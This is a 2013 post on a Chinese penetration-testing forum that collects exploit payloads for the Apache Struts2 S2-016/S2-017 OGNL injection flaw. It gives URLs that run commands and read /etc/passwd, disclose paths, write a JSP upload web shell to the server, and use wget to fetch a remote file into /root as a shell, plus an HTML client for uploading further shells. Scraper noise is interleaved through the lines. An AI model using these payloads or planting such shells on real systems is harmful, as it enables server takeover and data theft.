中国网络渗透测试联盟

标题: Struts2 S2-016/S2-017漏洞执行代码 [打印本页]
作者: admin    时间: 2013-7-18 23:03
标题: Struts2 S2-016/S2-017漏洞执行代码
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
7 A- h1 o# j8 b4 I( ~; @3 q; z" F$ u
喜欢就点一下感谢吧^_^2 |/ N' |/ R( l: g2 L
& E" k1 W; H1 N
带回显命令执行:! F8 Q' k: y# x1 E1 U$ R- `

& d# i, I0 X. \) i: Lhttp://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
2 a; c# k4 X/ p9 G1 {  J
0 `# F* t7 N- E% h
: P( \( x3 N0 j
0 U6 t1 O& h, Q8 G
$ N. j8 _3 P. n) ~6 F3 A6 q- S/ _* ]* ~9 K

1 j! q8 g4 g! u; t. j
; p5 q) v# a' u2 C爆路径:
- v* O. M" m+ t# B
. B! L- e  q* W! E2 P# C' I6 c. ihttp://www.example.com/struts2-b ... 8%29.close%28%29%7D
) B5 [( `- j' ^" R1 s- ], [6 O, Y4 ^+ n8 B- Y- |
% H2 \. P, {) {; a% |4 M
0 Y5 F+ z! N+ U9 Z$ m

& Y$ v' q( b7 S9 q) w$ L6 b2 s: g: E, F
写文件:
# Q: K# T+ c8 t( f) l
, [0 A- n( C7 h  Q- ~0 j6 D: `http://www.example.com/struts2-blank/example/X.action?redirect:${
/ ^8 y2 l  w4 }/ d% e7 I2 V
& \/ l' p5 q# v1 w* c4 D! r%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),0 S7 [/ v: X! Q4 h- A

  |- U% `. \/ M%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
! z& _4 u5 ]+ w$ t9 _0 H
' `7 b; O! D5 A* x; |4 A* Mnew+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()7 C; L, @+ h* m
8 d  s' I; F% N+ B$ Y
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e" ^* Y& A# \, Z! G% `

4 r/ w; z+ C. X+ s9 K- c  C# H# L) M! i8 A4 ^- i2 H) Z
$ W" B4 K/ x& P* n9 A
写入的文件内容:
$ |& x* f1 M6 `0 u# V7 [. Z+ U4 _' P8 M% x1 ?6 I0 Y  u
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      6 d$ {3 x* e5 a, C7 f
$ z; l5 f4 z; A( {  F+ g5 A
其实就是一个jsp的小马,需要客户端配合                                                                                  - e' u5 t2 e( x; [1 E
& b: H' X0 c4 ]( b" }- q+ L8 M
函数f是文件名,t是内容
* ~5 m% F4 Q! H  r3 h
3 v8 W( p, y# c% ]$ [客户端:
5 U$ \0 l5 |! ]+ U
# c7 A' n# W# \7 a& s+ ^+ H<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">, g% \) ^" Z" L  ]0 b0 Q
+ H. Y: w2 }: z+ x, j) ~5 p
<textarea name=t cols=120 rows=10 width=45>your code</textarea>; }. j' d4 R7 l9 T

/ x5 Q! O$ n0 w2 ~+ R" b<center>. Q% X+ H4 p. \0 Y2 {, G+ I

: _+ ^+ Y9 r2 B; r: q, B" @) b
' v8 H0 O/ a3 L5 F! u6 k: ~$ B( k, R) F/ U5 ^; a
<input type=submit value="提交">; L. U5 W/ l  l+ u6 E1 Y

4 f7 Z3 }* o, P</form>- r- R$ n, Y; K* w# _

7 ~$ E/ c1 C8 z1 q% I就在当前目录建立一个fjp.jsp" [) a* A  \# g' d6 S! r- Q. p; W
6 ^1 V3 g# D  ?( u4 K5 Z4 ?
shell:http://www.example.com/struts2-blank/example/fjp.jsp
0 v; U; g; m  K  j2 M8 {& M1 P
6 K3 ~' S! x- ]4 L
. Y  D! N% K) d& P3 g7 f5 ]6 r
5 l7 D$ Z) b* i9 c, v" A' h还有@园长的一个客户端:- ~4 p$ E( F$ I; U; c& o

. }4 p3 O2 T% s% x7 d9 A) \  P<html>
$ ?7 n- M$ o9 m! B. ?4 q- A3 N, V) G1 A# p) |2 |
<head>
8 Y7 w6 `' `+ p9 I0 A
1 ], O: I; H* p6 z2 D  ?0 j<meta http-equiv="content-type" content="text/html;charset=utf-8">- T- p' B: _. Q$ [9 x

" Q* M- I' R5 h9 X) v<title>jsp-园长</title>
% o- e$ R  I, k& V  r" |, ]* l' _* Q' w( Z/ f
</head>
' q+ _% W% q+ E# w  p& ~- T$ j; E% O: s1 n4 o- ^
<style>
" |9 f; B7 V1 J6 t+ L9 z( D4 ^+ x8 |" |) O7 |
.main{width:980px;height:600px;margin:0 auto;}
/ [+ Z' i4 M; r0 x
% s& o) l6 h/ c* M' u' \6 y5 ]6 V/ B.url{width:300px;}
0 z5 F" k/ u1 E$ k; j# w1 R  f
& _. }$ c. C: _. P8 z1 A6 ~! \: g.fn{width:60px;}
9 I. V( T9 v, m' g
* f8 H8 O) C) w& f.content{width:80%;height:60%;}& h# y  K- d, R1 n" \3 R0 m6 d
: }' D6 M; G0 p; s9 W1 }+ K, h! t
</style>
# [' r  ]  `9 f; h) |; k+ A0 U
: N# t9 z. c/ W8 i4 R( d<script>, l! I& r' }! W
$ L" s' i/ ~( x, G6 L3 b" {
  function upload(){
4 m. v: D9 w7 k5 [, c6 T: g) B! Y8 T3 D. ?7 P
    var url = document.getElementById('url').value,
, o9 w* U- I( m: t/ I
# I# X; p- p+ n6 Y8 A- g      content = document.getElementById('content').value,$ H# r) V& [: u9 N$ Z/ t) j$ f
# V& f1 o" \. ~3 |4 |
      fileName = document.getElementById('fn').value,
  U+ T% a) N* A! J" M4 U; R( v7 @6 E& Y. M, ^5 ^, X
      form = document.getElementById('fm');; e1 }4 f% z; h- p8 t( y- ~) _2 P& n2 A

: L3 O+ z$ L7 G( o! W    if(url.length == 0){9 H( s5 G# `8 L- s; a
; M; d9 {2 K  R4 M
      alert("Url not allowd empty!");$ G* W! X1 W( ^

) x8 A+ H3 s* I' |7 B7 Q) _, Q, A      return ;
3 A2 u% @7 ^" r" x, n0 W! }5 V* ^2 j& Z# m
    }- A' W0 S# F- v1 W6 ]
+ ~. ]" \- ]9 ^( ?1 T+ j
    if(content.length == 0){
* P: Y5 `( c+ e* s. O' Y/ S! b4 W( B5 ]
      alert("Content not allowd empty!");! }9 `( m. }" ]: t

( j" r- i! ~5 r2 D4 i; C2 v      return ;
; d. N9 N4 I3 d$ c* z8 C( v% r# l5 f% K- A. m: T/ Y: h: l
    }
2 w8 H; ?0 C7 r+ t* X7 ~1 B* L; s
    if(fileName.length == 0){5 ~2 e! ?: g, U6 W$ p9 o  v( K  r

! n3 F* c4 M+ I! _* j- M* S" \      alert("FileName not allowd empty!");
- p( X5 {& d7 D0 j, ?" {, t' ]/ i
      return ;' [5 @/ d5 q8 s, g4 }9 q" a. m
+ Y7 e3 u0 ]2 u4 `% U5 @3 n
    }: m1 f/ g! ?9 A" i: N, F

: ^. z: _# d2 h) z" w& K& u    form.action = url;
( }0 w2 u3 [. }- V, a
2 S- ?2 _( ?* E- y9 m- z: s+ c    form.submit();
5 w/ ~- J2 M8 \5 A2 |( D& V; I: P' a1 p$ f  b
  }
. }- e1 `0 O  I& A+ H% v0 v, ]- c. \* |+ r+ O8 \" I; O
</script>8 Q3 M+ x1 L2 L- S

" b7 I2 Y+ a% H. s! h<body>& `0 C7 A' f$ \4 _- C! A! O# s

- z" ~# b6 y$ z7 P0 m" ^  `3 F<div class="main">7 d' }; a. w9 \+ u- U- Y6 s0 ~) ]
) R0 J$ `1 h. V' c. x  r
  <form id="fm" method="post">  
( e) c( J$ c* s! a
/ f8 L0 O1 V& @3 X5 g    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  
  j( L1 _5 e# B1 O3 C( O* b6 s% R2 @( J2 `* }4 I& A
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  
8 y3 H0 K/ e3 k% S( Z, t
7 t* n. v: y) c. n    <a href="javascript:upload();">Upload</a>! E3 k" i- i# n% k0 _
3 C1 g& |# G; w5 K/ M4 I* W% ?

7 y: E/ a7 l% d6 s' N3 D2 A
+ d  A( I. W& b: |    <textarea id="content" class="content" name="t" ></textarea>
, b0 S9 |7 E' m! o+ d! V' {: l* T. \+ M; r$ q* l
  </form>5 t5 H2 e6 C/ m$ o' w/ a3 L

# m2 b! H0 P( I9 C, P</div>
: x2 D) X* T; R6 P) D) g3 |
* t* W9 k  D8 }; T4 P% _" E5 l/ n</body>1 l% {2 U! O( x. {& s

7 h) u- c) X5 n</html>
7 ~% b0 S8 W% t( t4 ?! k9 j, \* {+ L2 p8 e8 I; h

% [& [0 g, f! A0 n$ R  c6 k
: S; H- a" D! S7 H还有@X发的一个wget的getshell
, u7 _2 w) s/ E1 Y9 O  n
8 ?) I0 Q1 V9 v; A. L6 ~. G* D?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}4 S; m& R/ c8 t! t7 }
4 |8 u  X2 J* \5 G5 K# d2 v
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}0 A3 h4 ~/ `: I. ]8 `4 u3 e
复制代码



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2